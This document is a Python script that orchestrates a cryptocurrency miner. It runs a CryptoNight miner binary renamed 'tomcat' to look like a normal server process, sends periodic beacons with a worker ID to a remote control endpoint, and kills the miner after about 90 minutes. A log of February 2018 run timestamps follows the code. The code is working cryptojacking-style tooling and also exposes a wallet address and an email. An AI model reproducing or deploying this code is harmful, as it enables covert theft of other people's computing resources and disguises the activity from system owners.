import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:21:07.289734
#2018-02-17 17:09:01.339892
#2018-02-17 18:57:05.252235
#2018-02-17 20:45:08.947386
#2018-02-17 22:33:04.043969
#2018-02-18 00:17:06.085655
#2018-02-18 02:08:05.676059
#2018-02-18 03:55:07.397453
#2018-02-18 05:42:01.417088
#2018-02-18 07:34:02.184771
#2018-02-18 09:22:03.785830
#2018-02-18 11:08:04.677677
#2018-02-18 12:54:06.925528
#2018-02-18 14:40:06.302228
#2018-02-18 16:30:04.750382
#2018-02-18 18:19:05.630083
#2018-02-18 20:05:07.510231
#2018-02-18 21:52:06.477990
#2018-02-18 23:41:05.193967
#2018-02-19 01:27:01.458335
#2018-02-19 03:15:06.886041
#2018-02-19 05:00:08.344868
#2018-02-19 06:46:06.348579
#2018-02-19 08:35:07.935076
#2018-02-19 10:24:05.156048
#2018-02-19 12:12:04.538637
#2018-02-19 13:59:05.919656
#2018-02-19 15:48:01.936411
#2018-02-19 17:35:10.219896
#2018-02-19 19:24:08.694611
#2018-02-19 21:12:05.703757
#2018-02-19 22:58:01.288158
#2018-02-20 00:41:05.896427
#2018-02-20 02:31:01.796932
#2018-02-20 04:20:01.715053
#2018-02-20 06:04:05.522185
#2018-02-20 07:48:08.394117
#2018-02-20 09:34:04.860082
#2018-02-20 11:18:02.172479
#2018-02-20 13:05:03.154998
#2018-02-20 14:49:10.960847
#2018-02-20 16:31:10.709483
#2018-02-20 18:18:04.368557
#2018-02-20 20:09:05.550495
#2018-02-20 21:55:07.749163
#2018-02-21 00:56:05.616631
#2018-02-21 02:42:07.747550
#2018-02-21 04:31:03.732746
#2018-02-21 06:18:06.022435
#2018-02-21 08:04:07.243165
#2018-02-21 09:50:03.723036
#2018-02-21 11:38:09.080759
#2018-02-21 13:29:01.761095
#2018-02-21 15:13:07.017284
#2018-02-21 17:04:01.459385
#2018-02-21 18:52:08.416054
#2018-02-21 20:41:05.717411
#2018-02-21 22:26:01.863704
#2018-02-22 00:16:06.839736
#2018-02-22 03:01:01.292952
#2018-02-22 04:47:03.956698
#2018-02-22 06:32:01.327087
#2018-02-22 08:21:04.003242
#2018-02-22 10:09:05.100221
#2018-02-22 11:55:05.372399
#2018-02-22 13:39:05.163519
#2018-02-22 15:27:08.638895
#2018-02-22 17:14:05.645136
#2018-02-22 18:59:09.659457
#2018-02-22 20:52:02.060999
#2018-02-22 22:37:01.921634
#2018-02-23 00:23:07.448704
#2018-02-23 02:10:07.613374
#2018-02-23 04:01:05.347031
#2018-02-23 05:48:05.552604
#2018-02-23 07:36:02.219376
#2018-02-23 09:39:06.811894
#2018-02-23 11:43:05.890182
#2018-02-23 13:32:04.314064
#2018-02-23 15:19:09.010038
#2018-02-23 17:07:05.788701
#2018-02-23 18:35:03.692735
#2018-02-23 20:17:05.435415
#2018-02-23 21:49:03.458693
#2018-02-23 23:27:05.630188
#2018-02-24 01:07:02.149883
#2018-02-24 02:46:01.976398
#2018-02-24 04:21:06.275164
#2018-02-24 05:51:05.426224
#2018-02-24 07:27:05.502670
#2018-02-24 08:59:06.214042
#2018-02-24 10:51:01.780274
#2018-02-24 12:38:06.045590
#2018-02-24 14:27:05.051395
#2018-02-24 16:15:06.067743
#2018-02-24 18:09:07.052764
#2018-02-24 19:54:06.333714
#2018-02-24 21:38:07.066840
#2018-02-25 01:54:01.962943
#2018-02-25 05:03:05.074096
#2018-02-25 09:58:01.726443